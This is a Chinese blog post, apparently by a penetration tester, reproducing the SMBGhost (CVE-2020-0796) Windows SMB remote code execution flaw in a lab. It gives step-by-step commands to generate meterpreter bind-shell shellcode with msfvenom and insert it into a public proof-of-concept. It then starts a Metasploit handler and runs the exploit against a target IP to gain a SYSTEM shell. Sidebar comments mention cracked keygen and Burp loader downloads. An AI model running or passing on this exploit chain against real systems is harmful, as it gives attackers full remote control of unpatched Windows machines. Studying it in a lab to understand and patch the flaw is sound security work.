CVE-2020-0796(永恒之黑)漏洞复现利用GetShell

q##描述
北京时间2020年3月12日晚上,微软发布了一个最新到SMB远程代码执行漏洞。
SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。
被安全厂商命名为SMBGhost、EternalDarkness(“永恒之黑”)——我更喜欢ED这个称呼

影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

环境

靶机:windows10 1903 x64  
ip:172.16.127.134(关闭防火墙)
攻击机:MacOS ip:10.96.0.53

靶机地址:迅雷口令#X9861b84e#

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

利用

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python


#-p windows/x64/meterpreter/bind_tcp 设置payload为windows64位meterpreter控制台下的正向连接




#LPORT=8888 设置开发端口为6666
#-b '\x00' 设置在生成的程序中避免出现'\x00'
#-i 1 设置编码次数为一次
#-f python 设置生成python格式文件

生成shellcode

1、将生成的shellcode全部复制

2、打开POC文件夹的exploit.py(原文件)

然后替换字符

3、打开MSF监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 172.16.127.134
run

4、运行exploit.py脚本

python3 exploit.py -ip 172.16.127.134

若MSF控制台暂时无反应,则control+c终端,重新输入run

参考文章:https://www.cnblogs.com/Iamyoyodan/p/13081273.html

注意

只要成功即是system,但是shellcode极度不稳定,很容易卡死,靶机蓝屏,尤其注意只能以python3去执行脚本,其他版本我尝试后直接蓝屏。
建议靶机关闭防火墙,设置NAT模式,保证两台主机在同一网段内!

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


  Previous post Python学习笔记(三)
Next post   已到最新一篇

添加新评论

选择表情

  TimeLine

这两天抽时间写,有点忙。。。
--- updated on 2020-08-05 23:20:06 星期三

  About Me

九零后,集美貌与才华于一身。
专业提供各种网络技术支持,欢迎叨扰。
工作方向:渗透测试,IT运维。

  Recent Comments

  •  头疼的高健: 不好意思,是我自己的问题,解压密码就是RONIN
  •  头疼的高健: 我从RoninYun上下载的压缩包 使用RONIN这个密码,解压报错啊 不知道哪里出问题了,谁...
  •  阿林: 问一下订阅链接在放在哪了
  •  云帆沧海: 历经小20天,备案终于通过了,欢迎光临我的小站 www.2288m.com
  •  如果当时: 以解决!
  •  如果当时: burp-loader-keygen.jar 我执行这个文件就闪退,这是什么原因。
  •  云帆沧海: 打卡
  •  云帆沧海: 你好,由于香港空间访问速度不理想,现在更换到国内腾讯云,2288m.com 域名正在备案中,网...
  •  DIDI: 所以.. 解压密码多少.. 哈哈
  •  zoe: 在cmd里先把keygen.exe拖进来,然后复制run那个框命令执行

生命要得到丰盛的收获,必需阳光;同时,也需要“雨”的浇灌。

人生应该树立目标,否则你的精力会白白浪费。

山涧的泉水经过一路曲折,才唱出一支美妙的歌。

如若不是为了一个人,谁肯枯守一座城。城市和爱情,总是有着这样那样的关系。我们会因为一个人,去到那座城,因为那是一座爱的城;我们也会因为一个人,离开一座城,那是一座绝望的伤城。

常求有利别人,不求有利自己。